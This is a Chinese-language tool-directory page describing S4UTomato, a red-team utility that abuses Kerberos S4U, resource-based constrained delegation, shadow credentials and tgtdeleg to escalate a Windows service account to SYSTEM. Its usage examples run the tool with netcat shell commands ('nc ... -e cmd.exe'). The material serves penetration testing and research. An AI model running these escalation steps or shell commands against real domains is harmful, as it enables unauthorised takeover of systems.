Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
S4UTomato — 通过Kerberos将服务账户提升至LocalSystem | Kitploit
工具/GitHubGitHub/wh0amitz/s4utomato
权限提升漏洞利用后渗透利用红队
GitHubwh0amitz/s4utomato

S4UTomato

通过Kerberos将服务账户提升至LocalSystem

查看仓库
405772年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

S4UTomato

通过 Kerberos 将服务账户提升至 LocalSystem。

传统土豆

熟悉“土豆”系列权限提升的朋友应该知道,它可以将服务账户权限提升至本地系统权限。早期的“土豆”利用技术几乎相同:利用 COM 接口的某些特性,欺骗 NT AUTHORITY\SYSTEM 账户连接并认证到攻击者控制的 RPC 服务器。然后,通过一系列 API 调用,在此认证过程中执行中间人(NTLM 中继)攻击,从而在本地系统上生成 NT AUTHORITY\SYSTEM 账户的访问令牌。最后,窃取该令牌,并使用 CreateProcessWithToken() 或 CreateProcessAsUser() 函数传递令牌并创建新进程以获得 SYSTEM 权限。

Kerberos 方式如何

在 Windows 域环境中,SYSTEM、NT AUTHORITY\NETWORK SERVICE 以及 Microsoft 虚拟账户由加入域的计算机系统账户用于认证。理解这一点至关重要,因为在现代 Windows 版本中,大多数 Windows 服务默认使用 Microsoft 虚拟账户运行。值得注意的是,IIS 和 MSSQL 使用这些虚拟账户,我相信其他应用程序也可能使用它们。因此,我们可以滥用 S4U 扩展来获取本地机器上域管理员账户“Administrator”的服务票据。然后,借助 James Forshaw(@tiraniddo)的 SCMUACBypass,我们可以使用该票据创建一个系统服务并获得 SYSTEM 权限。这达到了与“土豆”系列权限提升技术中传统方法相同的效果。

在任何加入域的环境中,只要你能在 Windows 服务账户或 Microsoft 虚拟账户的上下文中运行代码,并且 Active Directory 没有完全强化防御此类攻击,你就可以利用上述技术进行本地权限提升。

在此之前,我们需要获取本地机器账户的 TGT(票据授予票据)。这并不容易,因为服务账户权限的限制,我们无法获取计算机的长效密钥,从而无法构造 KRB_AS_REQ 请求。为了实现上述目标,我利用了三种技术:基于资源的约束性委派、影子凭证 和 Tgtdeleg。我基于 Rubeus 工具集构建了我的项目。

如何使用与示例

root@kitploit:~
C:\Users\whoami\Desktop>S4UTomato.exe --help

S4UTomato 1.0.0-beta
Copyright (c) 2023

  -d, --Domain              要认证的域(FQDN)。
  -s, --Server              域控制器或 LDAP 服务器的主机名。
  -m, --ComputerName        要创建的新计算机账户名称。
  -p, --ComputerPassword    要创建的新计算机账户密码。
  -f, --Force               强制更新计算机对象的 'msDS-KeyCredentialLink' 属性。
  -c, --Command             要运行的程序。
  -v, --Verbose             输出详细的调试信息。
  --help                    显示此帮助屏幕。
  --version                 显示版本信息。

通过基于资源的约束性委派进行 LEP

root@kitploit:~
S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 127.0.0.1 4444 -e cmd.exe"

rbcd

通过影子凭证 + S4U2self 进行 LEP

root@kitploit:~
S4UTomato.exe shadowcred -c "nc 127.0.0.1 4444 -e cmd.exe" -f

shadowcred

通过 Tgtdeleg + S4U2self 进行 LEP

root@kitploit:~
# 首先通过 Tgtdeleg 获取 TGT
S4UTomato.exe tgtdeleg
# 然后运行 SCMUACBypass 以获得 SYSTEM 权限
S4UTomato.exe krbscm -c "nc 127.0.0.1 4444 -e cmd.exe"

tgtdeleg

下载工具